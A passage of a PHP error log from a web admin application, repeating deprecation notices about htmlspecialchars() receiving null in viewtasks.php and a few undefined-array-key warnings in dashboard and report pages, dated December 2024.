deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Dec-2024 21:36:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Dec-2024 21:36:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Dec-2024 21:36:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Dec-2024 21:41:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 09:25:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:26:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:28:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:31:09 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:33:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): 